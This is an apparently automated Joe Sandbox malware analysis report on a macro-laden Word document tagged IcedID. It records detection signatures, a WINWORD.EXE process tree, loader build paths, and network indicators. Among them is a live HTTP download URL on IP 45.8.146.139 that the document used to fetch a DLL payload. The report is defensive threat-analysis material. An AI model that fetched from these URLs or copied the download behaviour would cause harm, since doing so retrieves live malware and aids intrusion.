Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
valliant.document.08.11.2022.doc

Overview

General Information

Sample Name:valliant.document.08.11.2022.doc
Analysis ID:682606
MD5:cadb9d5ed47b8df81a2addefed302a03
SHA1:f7197fa991510f99f25af2b502c40d3b48d1abbc
SHA256:9cb01729327bd958e32aa9481d5a81303627ab7a59b9ae134fb6600ef4e5b680
Tags:docIcedID
Infos:
Errors
  • Corrupt sample or wrongly selected analyzer.

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (creates forbidden files)
Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Machine Learning detection for sample
One or more processes crash
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 2908 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • WerFault.exe (PID: 1928 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 4128 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 2072 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 4132 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: valliant.document.08.11.2022.docVirustotal: Detection: 26%Perma Link
Source: valliant.document.08.11.2022.docReversingLabs: Detection: 18%
Machine Learning detection for sample
Source: valliant.document.08.11.2022.docJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: Binary string: P:\DocGeneratingSigning\ShellcodeDoc\DllLoaderShellcode\Build\RemoteDllLoader\Release-x32\RemoteDllLoader.pdb source: WINWORD.EXE, 00000000.00000000.286197791.0000000014DE0000.00000040.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.304891180.00000000148D7000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: P:\DocGeneratingSigning\ShellcodeDoc\DllLoaderShellcode\Build\MemLoader\Release-x32\MemLoader.pdb source: WINWORD.EXE, 00000000.00000000.286197791.0000000014DE0000.00000040.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.304891180.00000000148D7000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: P:\DocGeneratingSigning\ShellcodeDoc\DllLoaderShellcode\Build\RemoteDllLoader\Release-x32\RemoteDllLoader.pdb source: WINWORD.EXE, 00000000.00000000.286197791.0000000014DE0000.00000040.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.304891180.00000000148D7000.00000040.00000001.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\PROGRA~2\COMMON~1\MICROS~1\Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\PROGRA~2\COMMON~1\Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\VBA7.1\Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7.1\Jump to behavior

Software Vulnerabilities

barindex
Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\yD159.tmp.dllJump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\WerFault.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.3:49741
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.3:49741
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.3:49741
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.3:49741
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficHTTP traffic detected: GET /fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.8.146.139Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.8.146.139 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: WINWORD.EXE, 00000000.00000000.298474157.00000000127EC000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.268127860.000000000DD5A000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.291945137.000000000DD5A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/
Source: WINWORD.EXE, 00000000.00000000.298474157.00000000127EC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/8YXON-RX9R4781JWMO3UUH0NGDBO/-f
Source: WINWORD.EXE, 00000000.00000000.268334868.000000000DDD1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f
Source: WINWORD.EXE, 00000000.00000000.291653462.000000000DCF7000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267974065.000000000DCF7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f71USERNAME=userUSERPROFILE=C:
Source: WINWORD.EXE, 00000000.00000000.279533534.00000000127CF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f:
Source: WINWORD.EXE, 00000000.00000000.268298008.000000000DDB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-fC:
Source: WINWORD.EXE, 00000000.00000000.299025740.000000000D0BF000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.265671015.000000000D0BF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-fLMEM
Source: WINWORD.EXE, 00000000.00000000.299992544.000000000D27B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-fOOC:
Source: WINWORD.EXE, 00000000.00000000.290613577.000000000DBD9000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267559667.000000000DBD9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-fR
Source: WINWORD.EXE, 00000000.00000000.290613577.000000000DBD9000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267559667.000000000DBD9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-fc
Source: WINWORD.EXE, 00000000.00000000.290613577.000000000DBD9000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267559667.000000000DBD9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-fq
Source: WINWORD.EXE, 00000000.00000000.290613577.000000000DBD9000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267559667.000000000DBD9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-fv
Source: WINWORD.EXE, 00000000.00000000.298337380.0000000012780000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-fw
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://b.c2r.ts.cdn.office.net/prpoint
Source: WINWORD.EXE, 00000000.00000000.299778746.000000000D211000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266222017.000000000D211000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/prpoint
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: WINWORD.EXE, 00000000.00000000.289192987.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266167152.000000000D1FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glidesr
Source: WINWORD.EXE, 00000000.00000000.296099721.000000000B3DE000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.263614877.000000000B3DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram823
Source: WINWORD.EXE, 00000000.00000000.296099721.000000000B3DE000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.263614877.000000000B3DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/table
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionloggingTZ
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticatedp
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinslicensing.store.office.com/entitlement/queryI
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removevV
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/api3
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apiU
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechE
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.aadrm.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.aadrm.com/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.cortana.ai
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.diagnostics.office.comnq
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedbackD
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.diagnosticssdf.office.comXm
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.microsoftstream.com/api/=r
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.office.net
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.office.netC
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.office.net_
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.onedrive.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets_
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://augloop.office.com
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://augloop.office.com/v2
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com/v2(
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com/v2G
Source: WINWORD.EXE, 00000000.00000000.267335179.000000000DAE6000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.290124050.000000000DAE6000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: WINWORD.EXE, 00000000.00000000.299025740.000000000D0BF000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.265671015.000000000D0BF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml=3s
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://cdn.entity.
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.pngHH
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: WINWORD.EXE, 00000000.00000000.289192987.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266167152.000000000D1FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsellnt
Source: WINWORD.EXE, 00000000.00000000.289192987.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266167152.000000000D1FB000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://clients.config.office.net/
